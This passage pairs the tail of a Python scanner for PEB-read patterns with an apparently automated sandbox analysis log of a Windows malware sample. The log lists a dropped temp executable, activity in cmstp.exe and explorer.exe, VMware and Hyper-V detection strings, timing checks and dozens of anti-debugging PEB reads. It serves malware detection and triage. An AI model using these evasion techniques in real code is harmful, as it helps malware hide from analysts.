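        print(f"{addr:08X}  {kind:9}  {text}")
```

Because this is a byte scan rather than a disassembly, a push opcode that sits inside an immediate or a data table produces a false hit, and push ecx; ret is also emitted by ordinary compiler runtimes; use it as a triage signal, with density and clustering (PEB reads concentrated in one region of the unpacked code) rather than any single hit deciding the outcome.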
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File created: C:\Users\user\AppData\Local\Temp\mcwfy.exe Jump to dropped file
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\explorer.exe TID: 1008 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 3608 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B46A60 rdtscp 3_2_00B46A60
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 880 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 876 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe API coverage: 8.4 %
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_020607DA GetSystemInfo, 1_2_020607DA
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.533383702.000000000ED9C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWAz
Source: explorer.exe, 00000004.00000002.569424230.0000000004437000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.559686788.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.536187696.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533502137.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581354235.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553825215.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.563071453.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0040B06F GetProcessHeap, 1_2_0040B06F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B46A60 rdtscp 3_2_00B46A60
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0206005F mov eax, dword ptr fs:[00000030h] 1_2_0206005F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_02060109 mov eax, dword ptr fs:[00000030h] 1_2_02060109
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0206013E mov eax, dword ptr fs:[00000030h] 1_2_0206013E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0206017B mov eax, dword ptr fs:[00000030h] 1_2_0206017B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00B4F0BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00B4F0BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00B4F0BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B590AF mov eax, dword ptr fs:[00000030h] 3_2_00B590AF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19080 mov eax, dword ptr fs:[00000030h] 3_2_00B19080
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B93884 mov eax, dword ptr fs:[00000030h] 3_2_00B93884
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B93884 mov eax, dword ptr fs:[00000030h] 3_2_00B93884
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h] 3_2_00B140E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h] 3_2_00B140E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h] 3_2_00B140E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00B3B8E4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00B3B8E4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B158EC mov eax, dword ptr fs:[00000030h] 3_2_00B158EC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE4015 mov eax, dword ptr fs:[00000030h] 3_2_00BE4015
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE4015 mov eax, dword ptr fs:[00000030h] 3_2_00BE4015
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h] 3_2_00B97016
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h] 3_2_00B97016
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h] 3_2_00B97016
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE1074 mov eax, dword ptr fs:[00000030h] 3_2_00BE1074
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD2073 mov eax, dword ptr fs:[00000030h] 3_2_00BD2073
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h] 3_2_00B30050
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h] 3_2_00B30050
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h] 3_2_00B461A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h] 3_2_00B461A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B969A6 mov eax, dword ptr fs:[00000030h] 3_2_00B969A6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42990 mov eax, dword ptr fs:[00000030h] 3_2_00B42990
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A185 mov eax, dword ptr fs:[00000030h] 3_2_00B4A185
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3C182 mov eax, dword ptr fs:[00000030h] 3_2_00B3C182
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00B1B1E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BA41E8 mov eax, dword ptr fs:[00000030h] 3_2_00BA41E8
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4513A mov eax, dword ptr fs:[00000030h] 3_2_00B4513A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h] 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 mov ecx, dword ptr fs:[00000030h] 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h] 3_2_00B19100
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1B171 mov eax, dword ptr fs:[00000030h] 3_2_00B1B171
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1C962 mov eax, dword ptr fs:[00000030h] 3_2_00B1C962
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B944 mov eax, dword ptr fs:[00000030h] 3_2_00B3B944
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00B2AAB0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00B4FAB0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h] 3_2_00B152A5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4D294 mov eax, dword ptr fs:[00000030h] 3_2_00B4D294
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42AE4 mov eax, dword ptr fs:[00000030h] 3_2_00B42AE4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42ACB mov eax, dword ptr fs:[00000030h] 3_2_00B42ACB
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B54A2C mov eax, dword ptr fs:[00000030h] 3_2_00B54A2C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h] 3_2_00B15210
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B15210 mov ecx, dword ptr fs:[00000030h] 3_2_00B15210
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B1AA16
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDAA16 mov eax, dword ptr fs:[00000030h] 3_2_00BDAA16
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B33A1C mov eax, dword ptr fs:[00000030h] 3_2_00B33A1C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B28A0A mov eax, dword ptr fs:[00000030h] 3_2_00B28A0A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5927A mov eax, dword ptr fs:[00000030h] 3_2_00B5927A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCB260 mov eax, dword ptr fs:[00000030h] 3_2_00BCB260
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8A62 mov eax, dword ptr fs:[00000030h] 3_2_00BE8A62
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDEA55 mov eax, dword ptr fs:[00000030h] 3_2_00BDEA55
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BA4257 mov eax, dword ptr fs:[00000030h] 3_2_00BA4257
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h] 3_2_00B19240
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h] 3_2_00B44BAD
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00BE5BA5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42397 mov eax, dword ptr fs:[00000030h] 3_2_00B42397
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4B390 mov eax, dword ptr fs:[00000030h] 3_2_00B4B390
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD138A mov eax, dword ptr fs:[00000030h] 3_2_00BD138A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCD380 mov ecx, dword ptr fs:[00000030h] 3_2_00BCD380
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B21B8F mov eax, dword ptr fs:[00000030h] 3_2_00B21B8F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h] 3_2_00B403E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00B3DBE9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B953CA mov eax, dword ptr fs:[00000030h] 3_2_00B953CA
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD131B mov eax, dword ptr fs:[00000030h] 3_2_00BD131B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B43B7A mov eax, dword ptr fs:[00000030h] 3_2_00B43B7A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00B1DB60
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8B58 mov eax, dword ptr fs:[00000030h] 3_2_00BE8B58
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1F358 mov eax, dword ptr fs:[00000030h] 3_2_00B1F358
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1DB40 mov eax, dword ptr fs:[00000030h] 3_2_00B1DB40
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2849B mov eax, dword ptr fs:[00000030h] 3_2_00B2849B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD14FB mov eax, dword ptr fs:[00000030h] 3_2_00BD14FB
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B96CF0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00BE8CD6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4BC2C mov eax, dword ptr fs:[00000030h] 3_2_00B4BC2C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h] 3_2_00BE740D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h] 3_2_00B96C0A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3746D mov eax, dword ptr fs:[00000030h] 3_2_00B3746D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAC450 mov eax, dword ptr fs:[00000030h] 3_2_00BAC450
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A44B mov eax, dword ptr fs:[00000030h] 3_2_00B4A44B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00B41DB5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE05AC mov eax, dword ptr fs:[00000030h] 3_2_00BE05AC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B435A1 mov eax, dword ptr fs:[00000030h] 3_2_00B435A1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4FD9B mov eax, dword ptr fs:[00000030h] 3_2_00B4FD9B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h] 3_2_00B42581
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h] 3_2_00B12D8A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BC8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00BC8DF1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00B2D5E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00BDFDE2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1AD30 mov eax, dword ptr fs:[00000030h] 3_2_00B1AD30
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDE539 mov eax, dword ptr fs:[00000030h] 3_2_00BDE539
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8D34 mov eax, dword ptr fs:[00000030h] 3_2_00BE8D34
